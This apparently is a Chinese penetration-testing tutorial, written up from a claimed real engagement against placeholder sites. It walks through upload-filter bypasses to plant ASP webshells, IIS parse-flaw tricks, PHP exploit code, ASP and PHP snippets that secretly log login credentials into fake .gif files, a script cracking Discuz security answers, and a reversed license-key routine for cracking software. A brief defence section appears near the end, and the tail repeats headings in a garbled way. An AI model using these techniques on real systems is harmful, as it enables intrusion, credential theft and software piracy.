渗透测试实战技术教学文档<\/h1>

0x00 前言与背景<\/h2>

本教学文档基于一次真实的渗透测试案例，展示了从信息收集到最终获取系统权限的完整过程。案例中涉及多种技术手段，包括但不限于：<\/p>

信息收集与侦查<\/li>
CMS漏洞利用<\/li>
旁站攻击<\/li>
二级域名渗透<\/li>
文件上传漏洞利用<\/li>
SQL注入<\/li>
社会工程学<\/li>
权限提升<\/li>

密码破解与碰撞<\/li> <\/ul>

0x01 信息收集阶段<\/h2>

1.1 目标识别<\/h3>
初始目标：www.111.com（CMS系统）和关联论坛（Discuz! X2）<\/p>

1.2 技术手段<\/h3>

文件枚举<\/strong>：<\/p>

通过robots.txt发现敏感目录<\/li>
暴力猜解后台管理文件（如admin.php）<\/li>
发现3gadm.php文件，确认使用diy-page8.3 CMS<\/li> <\/ul> <\/li>

服务器指纹识别<\/strong>：<\/p>

通过错误页面识别IIS 7.5<\/li>
使用HEAD请求确认：Server: Microsoft-IIS\/7.5<\/code><\/li>
推断操作系统为Windows Server 2008<\/li> <\/ul> <\/li>
CDN绕过技术<\/strong>：<\/p> 通过不同地区VPN ping测试发现不同IP<\/li> 搜索关联域名发现www.222.com<\/li> 旁注查询获取真实IP<\/li> <\/ul> <\/li> <\/ol> 0x02 漏洞发现与利用<\/h2> 2.1 IIS7.5+FastCGI解析漏洞<\/h3> 漏洞原理<\/strong>： IIS7.5+FastCGI在默认配置下可能导致任意文件以PHP方式解析，类似Nginx解析漏洞。<\/p> 验证方法<\/strong>： http:\/\/www.222.com\/images\/aaa.gif\/kyo.php<\/code> 返回200状态码而非404<\/p> 利用限制<\/strong>：<\/p> 论坛附件上传到独立文件服务器（Windows 2003）<\/li> CMS禁止普通用户注册和登录<\/li> <\/ul> 2.2 二级域名渗透<\/h3> 发现二级域名a.111.com（博客系统），所在服务器托管多个网站（虚拟主机）<\/p> 攻击路径<\/strong>：<\/p> 识别www.aaa.com后台：http:\/\/www.aaa.com\/admin\/admin_index.php<\/code><\/li> 利用FCKeditor上传漏洞：添加GIF头到ASP木马<\/li> 修改上传包：filename="C:\aa.asp .gif"<\/code><\/li> <\/ul> <\/li> 获取webshell：http:\/\/www.aaa.com\/uploads\/120107005538_53.asp<\/code><\/li> <\/ol> 防护绕过<\/strong>：<\/p> 星外+护卫神防护组合<\/li> 删除wscript.shell等危险组件<\/li> 不支持aspx执行<\/li> <\/ul> 0x03 权限提升技术<\/h2> 3.1 PHP漏洞利用<\/h3> 目标环境<\/strong>：<\/p> PHP 5.2.9-2<\/li> Windows Server 2003<\/li> <\/ul> 利用漏洞<\/strong>：<\/p> PHP hash_update_file() Already Freed Resource Access Vulnerability<\/li> PHP addcslashes() Interruption Information Leak Vulnerability<\/li> <\/ol> 组合利用<\/strong>：<\/p> function<\/span> hexdump<\/span>($x) { <\/span><\/span> $ret_long =<\/span> ord<\/span>($x[0x13<\/span>]) *<\/span> 0x1000000<\/span> +<\/span> ord<\/span>($x[0x12<\/span>]) *<\/span> 0x10000<\/span> +<\/span> ord<\/span>($x[0x11<\/span>]) *<\/span> 0x100<\/span> +<\/span> ord<\/span>($x[0x10<\/span>]); <\/span><\/span> $ret_long =<\/span> $ret_long +<\/span> 0x20<\/span>; <\/span><\/span> return<\/span> $ret_long; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用流程<\/strong>：<\/p> 使用addcslashes()泄露内存信息<\/li> 获取shellcode存放地址<\/li> 构造纯字母数字shellcode<\/li> 通过hash_update_file()执行shellcode<\/li> <\/ol> 3.2 ASPX提权技术<\/h3> 步骤<\/strong>：<\/p> 寻找可写目录：C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index<\/code><\/li> 上传定制aspx木马（绕过护卫神检测）<\/li> 上传cmd.exe到可写目录<\/li> 执行命令获取系统信息<\/li> <\/ol> 0x04 Web应用漏洞挖掘<\/h2> 4.1 3hooCMS V3 SP2漏洞分析<\/h3> SQL注入漏洞<\/strong>：文件：Search.Asp 漏洞代码：<\/p> SoKey=trim(request("sokey")) sql="select * from [info] where "&LanguageSet&"Name like'%"&SoKey&"%' order by id desc;" <\/code><\/pre> 利用方式<\/strong>： POST型注入，需使用工具如NBSI进行自动化检测<\/p> 4.2 后台getshell技术<\/h3> 数据库备份漏洞<\/strong>：文件：Admin_DataBackup.asp 关键代码：<\/p> bkfolder=request.form("bkfolder") MakeNewsDir bkfolder fso.copyfile dbpath,bkfolder& "\"& bkdbname & ".mdb" <\/code><\/pre> 利用步骤<\/strong>：<\/p> 修改bkfolder参数为"kyo.asp"<\/li> 创建恶意文件夹"kyo.asp"<\/li> 通过IIS6.0目录解析漏洞执行木马<\/li> 访问路径：http:\/\/www.bbb3.com\/manage\/kyo.asp\/data.mdb<\/code><\/li> <\/ol> 0x05 密码破解技术<\/h2> 5.1 密码嗅探技术<\/h3> ASP实现代码<\/strong>：<\/p> thename=replace(trim(request.form("username"))) thepass=replace(trim(Request.form("password"))) SaveFile="page.gif" GetPostStr=thename&"|"&thepass set F=server.CreateObject("scripting.filesystemobject") set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0) I.WriteLine(GetPostStr) I.close <\/code><\/pre> PHP实现代码<\/strong>：<\/p> $username1 =<\/span> $this-><\/span>Username<\/span>; <\/span><\/span>$password1 =<\/span> $this-><\/span>Password<\/span>; <\/span><\/span>$file=<\/span>".\/.\/images\/bg1.gif"<\/span>; <\/span><\/span>$handle =<\/span> @<\/span>fopen<\/span>(".\/.\/images\/th_bg1.gif"<\/span>, "a"<\/span>); <\/span><\/span>$recontent =<\/span> fread<\/span>($handle,filesize<\/span>($file)); <\/span><\/span>$content=<\/span> $username1.<\/span>$password1.<\/span>"----date is:"<\/span>.<\/span>date<\/span>("Y-m-d H:i:s"<\/span>).<\/span>"<\/span>\r\n<\/span>"<\/span>; <\/span><\/span>$result=<\/span>$recontent.<\/span>"<\/span>\r\n<\/span>"<\/span>.<\/span>$content; <\/span><\/span>@<\/span>fwrite<\/span>($handle,$result); <\/span><\/span><\/code><\/pre>5.2 Discuz! 提示问题破解<\/h3> 加密算法<\/strong>： substr(md5($pass.md5($id)),16,8)<\/code><\/p> 碰撞程序<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span>error_reporting<\/span>(0<\/span>); <\/span><\/span>if<\/span> ($argc<<\/span>2<\/span>) { <\/span><\/span> print_r<\/span>('Usage: php '<\/span>.<\/span>$argv[0<\/span>].<\/span>' hash\nExample:php '<\/span>.<\/span>$argv[0<\/span>].<\/span>' 91de8255\n'<\/span>); <\/span><\/span> die<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>$fd=<\/span>fopen<\/span>("pass.dic"<\/span>,"r"<\/span>); <\/span><\/span>if<\/span>(!<\/span>$fd){ <\/span><\/span> echo<\/span> "error:打开字典文件错误"<\/span> ; <\/span><\/span> die<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>while<\/span>($buf=<\/span>fgets<\/span>($fd)){ <\/span><\/span> for<\/span>($i=<\/span>1<\/span>;$i<<\/span>8<\/span>;$i++<\/span>){ <\/span><\/span> $tmp=<\/span>substr<\/span>(md5<\/span>(trim<\/span>($buf).<\/span>md5<\/span>($i)),16<\/span>,8<\/span>); <\/span><\/span> $conn =<\/span> strcmp<\/span>($tmp,$argv[1<\/span>]); <\/span><\/span> if<\/span>($conn==<\/span>0<\/span>){ <\/span><\/span> echo<\/span> "密码破解成功。<\/span>\n<\/span>"<\/span>.<\/span>"提示问题答案为:"<\/span>.<\/span>$buf.<\/span>"提示的问题为:"<\/span>.<\/span>theask<\/span>((int<\/span>)$i).<\/span>"<\/span>\n<\/span>"<\/span>; <\/span><\/span> die<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>if<\/span>($conn!=<\/span>0<\/span>){ <\/span><\/span> echo<\/span> "没有正确的密码"<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>fclose<\/span>($fd); <\/span><\/span> <\/span><\/span>function<\/span> theask<\/span>($var){ <\/span><\/span> if<\/span>($var==<\/span>1<\/span>) return<\/span> "母亲的名字"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>2<\/span>) return<\/span> "爷爷的名字"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>3<\/span>) return<\/span> "父亲出生的城市"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>4<\/span>) return<\/span> "您其中一位老师的名字"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>5<\/span>) return<\/span> "您个人计算机的型号"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>6<\/span>) return<\/span> "您最喜欢的餐馆名称"<\/span>; <\/span><\/span> elseif<\/span>($var==<\/span>7<\/span>) return<\/span> "驾驶执照最后四位数字"<\/span>; <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>0x06 软件逆向与破解<\/h2> 6.1 SuperDic字典生成器分析<\/h3> 注册验证流程<\/strong>：<\/p> 生成申请号（基于GetVolumeInformationA）<\/li> 对申请号加密：f1(申请号)<\/li> 对注册码加密：f2(注册码)<\/li> 比较f1(申请号) == f2(注册码)<\/li> <\/ol> 逆向算法<\/strong>：<\/p> void<\/span> DicDecode<\/span>(char<\/span> *<\/span>str){ <\/span><\/span> char<\/span> end[64<\/span>]=<\/span>{0<\/span>}; <\/span><\/span> if<\/span> (strlen(str) !=<\/span>16<\/span>) *<\/span>str=<\/span>0<\/span>; <\/span><\/span> <\/span><\/span> for<\/span>(int<\/span> i=<\/span>0<\/span>,j=<\/span>0<\/span>;i<<\/span>16<\/span>,j<<\/span>64<\/span>;i++<\/span>,j=<\/span>j+<\/span>4<\/span>){ <\/span><\/span> if<\/span>(str[i]<=<\/span>'9'<\/span> &&<\/span> str[i]>=<\/span>'0'<\/span>){ <\/span><\/span> end[j]=<\/span>str[i]-<\/span>22<\/span>; <\/span><\/span> goto<\/span> LABEL_a; <\/span><\/span> } <\/span><\/span> if<\/span>(str[j]<=<\/span>'z'<\/span> &&<\/span> str[i]>=<\/span>'a'<\/span>){ <\/span><\/span> end[j]=<\/span>str[i]-<\/span>61<\/span>; <\/span><\/span> goto<\/span> LABEL_a; <\/span><\/span> } <\/span><\/span> if<\/span>(str[i]<=<\/span>'Z'<\/span> &&<\/span> str[i]>=<\/span>'A'<\/span>){ <\/span><\/span> end[j]=<\/span>str[i]-<\/span>65<\/span>; <\/span><\/span> } <\/span><\/span> LABEL_a:; <\/span><\/span> } <\/span><\/span> <\/span><\/span> for<\/span>(i=<\/span>0<\/span>;i<<\/span>64<\/span>;i=<\/span>i+<\/span>4<\/span>){ <\/span><\/span> if<\/span>(end[i]<=<\/span>i) { end[i]=<\/span>i-<\/span>end[i]; } <\/span><\/span> } <\/span><\/span> <\/span><\/span> int<\/span> v10[16<\/span>]; <\/span><\/span> for<\/span>(int<\/span> k=<\/span>0<\/span>,n=<\/span>0<\/span>;k<<\/span>16<\/span>,n<<\/span>64<\/span>;k++<\/span>,n=<\/span>n+<\/span>4<\/span>){ <\/span><\/span> v10[k]=<\/span>(int<\/span>)end[n]; <\/span><\/span> } <\/span><\/span> <\/span><\/span> for<\/span>(i=<\/span>0<\/span>;i<<\/span>16<\/span>;i++<\/span>){ <\/span><\/span> if<\/span>(v10[i] <=<\/span> 25<\/span> &&<\/span> v10[i]>=<\/span>0<\/span>){ <\/span><\/span> str[i]=<\/span>v10[i]+<\/span> 65<\/span>; <\/span><\/span> goto<\/span> LABEL_bb; <\/span><\/span> } <\/span><\/span> if<\/span>(v10[i] <=<\/span> 35<\/span> &&<\/span> v10[i]>=<\/span>26<\/span>){ <\/span><\/span> str[i]=<\/span>v10[i]+<\/span> 22<\/span>; <\/span><\/span> goto<\/span> LABEL_bb; <\/span><\/span> } <\/span><\/span> if<\/span>(v10[i] <<\/span> 61<\/span> &&<\/span> v10[i]>=<\/span>36<\/span>){ <\/span><\/span> str[i]=<\/span>v10[i]+<\/span> 61<\/span>; <\/span><\/span> } <\/span><\/span> LABEL_bb:; <\/span><\/span> } <\/span><\/span> <\/span><\/span> char<\/span> sigeliu[5<\/span>]=<\/span>{0x36<\/span>,0x36<\/span>,0x36<\/span>,0x36<\/span>,0<\/span>}; <\/span><\/span> strcat(str,sigeliu); <\/span><\/span>} <\/span><\/span><\/code><\/pre>0x07 防御建议<\/h2> 基于本次渗透测试中发现的漏洞，建议采取以下防御措施：<\/p> 服务器配置<\/strong>：<\/p> 及时更新IIS和PHP版本<\/li> 禁用不必要的HTTP方法<\/li> 配置严格的解析规则<\/li> <\/ul> <\/li> 应用程序安全<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用预编译语句防止SQL注入<\/li> 实现文件上传的白名单验证<\/li> 避免敏感信息泄露（如phpinfo）<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 遵循最小权限原则<\/li> 定期审计账户权限<\/li> 使用强密码策略<\/li> <\/ul> <\/li> 监控与日志<\/strong>：<\/p> 实施全面的日志记录<\/li> 设置异常行为警报<\/li> 定期检查系统完整性<\/li> <\/ul> <\/li> 安全意识<\/strong>：<\/p> 定期进行安全培训<\/li> 建立安全开发生命周期(SDLC)<\/li> 定期进行渗透测试和安全评估<\/li> <\/ul> <\/li> <\/ol> 0x08 总结<\/h2> 本案例展示了渗透测试中常见的技术路线和思维方法，强调了以下几点：<\/p> 信息收集是渗透测试的基础<\/li> 多个漏洞的组合利用往往能突破单一防御<\/li> 社会工程学是有效的辅助手段<\/li> 密码安全仍然是防御的关键环节<\/li> 持续学习和研究新技术对安全人员至关重要<\/li> <\/ol> 通过本案例的学习，安全人员可以更好地理解攻击者的思维方式和技术手段，从而构建更有效的防御体系。<\/p>

渗透测试实战技术教学文档<\/h1>

0x01 信息收集阶段<\/h2>

1.1 目标识别<\/h3> 初始目标：www.111.com（CMS系统）和关联论坛（Discuz! X2）<\/p>

0x02 漏洞发现与利用<\/h2>

0x03 权限提升技术<\/h2>

0x04 Web应用漏洞挖掘<\/h2>

0x05 密码破解技术<\/h2>

0x06 软件逆向与破解<\/h2>

1.1 目标识别<\/h3>
初始目标：www.111.com（CMS系统）和关联论坛（Discuz! X2）<\/p>